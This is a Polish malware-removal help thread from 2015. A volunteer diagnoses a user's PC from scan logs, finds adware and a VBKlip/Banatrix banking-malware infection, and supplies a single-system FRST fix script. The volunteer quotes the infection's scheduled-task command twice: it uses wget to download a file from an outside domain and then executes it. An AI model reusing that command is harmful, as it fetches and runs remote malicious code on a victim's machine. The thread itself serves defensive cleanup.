xantyr Opublikowano 6 Stycznia 2015 Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Witam, otóż mam prośbę czy mógłby ktoś zajrzeć w te logi i powiedzieć czy jest coś do wyczyszczenia w tym pc, bo czasami antywirus wyrzuca mi, że coś jest nie tak ze skype. Addition.txtPobieranie informacji ... FRST.txtPobieranie informacji ... Shortcut.txtPobieranie informacji ... Extras.TxtPobieranie informacji ... OTL.TxtPobieranie informacji ... gmer.txtPobieranie informacji ... Odnośnik do komentarza
picasso Opublikowano 6 Stycznia 2015 Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Czy przypadkiem nie chodzi o folder SkypEmoticons? Taki widać w logu, jest to adware a nie część Skype. Natomiast w logach widać też inne odpadki adware oraz czynną infekcję - wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań: Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Przeprowadź następujące operacje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7 Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\Program Files\Probit Software C:\Program Files\unisaLees C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\17691939238860040889 C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol C:\ProgramData\APN C:\ProgramData\EpicScale C:\Users\Maciej\AppData\Roaming\Easeware C:\Users\Maciej\AppData\Roaming\SkypEmoticons EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Odnośnik do komentarza
xantyr Opublikowano 6 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Okej wykonałem wszystko. Fixlog.txtPobieranie informacji ... FRST.txtPobieranie informacji ... Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Znów wyskakuje mi te skypemoticons Odnośnik do komentarza
picasso Opublikowano 7 Stycznia 2015 Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Proszę zaprezentuj konkretnie gdzie. Mówiłam wcześniej: picasso napisał(a): Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Dokładnie to czasami wyświetla w Malwarebytes-anti malware. W procesie skype.exe Niestety nie wyskakuje to dość często, więc nie mam jak zrobić screena :f Odnośnik do komentarza
picasso Opublikowano 7 Stycznia 2015 Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 To raczej wskazuje na poprawny Skype a nie usunięty już folder SkypEmoticons. Skoro program to wyświetla, to i powinny być nagrane te dane w dziennikach programu - szukaj informacji tekstowej, by tu przekleić. Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Coś takiego Detection, 2015-01-07 15:56:28, SYSTEM, MACIEJ-KOMPUTER, Protection, Malicious Website Protection, IP, 213.55.112.88, 32045, Inbound, C:\Program Files\Skype\Phone\Skype.exe, Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Poprzednie zadania pomyślnie wykonane i w ostatnim raporcie FRST nie widać oznak infekcji. Na wszelki wypadek podaj jednak nowe raporty FRST (główny + Addition). To typ połączeń "Inbound", czyli przychodzące, co nie oznacza jeszcze infekcji w systemie tylko potencjalnie jej próbę / atak. Program blokuje i OK. Pytania: - Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno? - W Skype: Narzędzia > Opcje > Zaawansowane > Zarządzaj dostępem innych programów do Skype > co widzisz na liście Kontroli dostępu API? IP 213.55.112.88 jest klasyfikowane jako "etiopskie": KLIK. IP pobierane u Ciebie z routera również jest z puli 213.x.x.x, ono jednak wskazuje adres polskiego providera: KLIK Tcpip\Parameters: [DhcpNameServer] 213.172.186.4 8.8.8.8 Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4. Podaj jeszcze odczyt z tego skanera: KLIK. Odnośnik do komentarza
xantyr Opublikowano 8 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 W opcjach skype nic nie jest dodane, na liście kontroli dostępu API niczego nie ma. Po skanie na stronie, którą dodałaś wyskakuje to: Jesteś bezpieczny. Interfejs administracyjny Twojego modemu jest niedostępny z Internetu. Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Miałeś podać jeszcze świeże logi FRST na wszelki wypadek. Odnośnik do komentarza
xantyr Opublikowano 8 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Skan dodam za 30 minut edytując ten post. Niestety trochę dłużej zeszło, oto i logi. Addition.txtPobieranie informacji ... FRST.txtPobieranie informacji ... Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 1. W nowych raportach FRST nic nie widać, toteż kończymy w zakresie czyszczenia. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK. 2. Na wszelki wypadek wykonaj jeszcze to: picasso napisał(a): Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4. Nie odpowiedziałeś mi na pytanie: picasso napisał(a): Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno? Odnośnik do komentarza
xantyr Opublikowano 9 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 9 Stycznia 2015 Routeru nie mam, mam internet kablowy do pc podłączony modemem. Już nie wyskakują żadne okienka, użyłem delfix. Właśnie z niczym nie są związane, nie wyskakują żadne okienka. Odnośnik do komentarza
Rekomendowane odpowiedzi